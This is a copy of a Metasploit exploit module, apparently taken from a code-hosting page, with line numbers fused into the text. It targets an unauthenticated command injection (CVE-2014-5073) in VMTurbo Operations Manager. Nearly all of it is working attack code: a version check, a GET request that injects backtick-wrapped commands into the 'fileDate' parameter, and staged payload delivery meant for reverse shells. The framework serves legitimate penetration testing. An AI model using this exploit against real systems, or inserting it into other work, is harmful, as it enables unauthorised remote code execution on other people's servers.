Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::CmdStager10include Msf::Exploit::EXE1112def initialize(info = {})13super(update_info(info,14'Name' => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',15'Description' => %q{16VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated17OS Command injection in the web interface. Use reverse payloads for the most18reliable results. Since it is a blind OS command injection vulnerability,19there is no output for the executed command when using the cmd generic payload.20Port binding payloads are disregarded due to the restrictive firewall settings.2122This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and234.6.24},25'Author' =>26[27# Secunia Research - Discovery and Metasploit module28'Emilio Pinna <emilio.pinn[at]gmail.com>'29],30'License' => MSF_LICENSE,31'References' =>32[33['CVE', '2014-5073'],34['OSVDB', '109572'],35['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']36],37'DisclosureDate' => '2014-06-25',38'Privileged' => false,39'Platform' => %w{ linux unix },40'Payload' =>41{42'Compat' =>43{44'ConnectionType' => '-bind'45}46},47'Targets' =>48[49[ 'Unix CMD',50{51'Arch' => ARCH_CMD,52'Platform' => 'unix'53}54],55[ 'VMTurbo Operations Manager',56{57'Arch' => [ ARCH_X86, ARCH_X64 ],58'Platform' => 'linux'59}60],61],62'DefaultTarget' => 163))6465deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')66end6768def check69begin70res = send_request_cgi({71'method' => 'GET',72'uri' => "/cgi-bin/vmtadmin.cgi",73'vars_get' => {74"callType" => "ACTION",75"actionType" => "VERSIONS"76}77})78rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout79vprint_error("Failed to connect to the web server")80return Exploit::CheckCode::Unknown81end8283if res and res.code == 200 and res.body =~ /vmtbuild:([\d]+),vmtrelease:([\d.]+),vmtbits:[\d]+,osbits:[\d]+/84version = $285build = $18687vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected")88else89vprint_status("Unexpected vmtadmin.cgi response")90return Exploit::CheckCode::Unknown91end9293# NOTE (@todb): This PHP style comparison seems incorrect, since94# strings are being compared and not numbers. Example:95# 1.9.3p547 :001 > a = "4.6"96# => "4.6"97# 1.9.3p547 :002 > b = "10.6"98# => "10.6"99# 1.9.3p547 :003 > a <= b100#101# Also, the description says 4.5 is also vuln. This doesn't102# appear to care.103if version and version <= "4.6" and build < "28657"104return Exploit::CheckCode::Appears105else106return Exploit::CheckCode::Safe107end108end109110def execute_command(cmd, opts)111begin112res = send_request_cgi({113'uri' => '/cgi-bin/vmtadmin.cgi',114'method' => 'GET',115'vars_get' => {116"callType" => "DOWN",117"actionType" => "CFGBACKUP",118"fileDate" => "\"`#{cmd}`\""119}120})121rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout122vprint_error("Failed to connect to the web server")123return nil124end125126vprint_status("Sent command #{cmd}")127end128129def exploit130131# Handle single command shot132if target.name =~ /CMD/133cmd = payload.encoded134res = execute_command(cmd, {})135136unless res137fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")138end139140print_status("Blind Exploitation - unknown exploitation state")141return142end143144# Handle payload upload using CmdStager mixin145execute_cmdstager({:flavor => :printf})146end147end148149150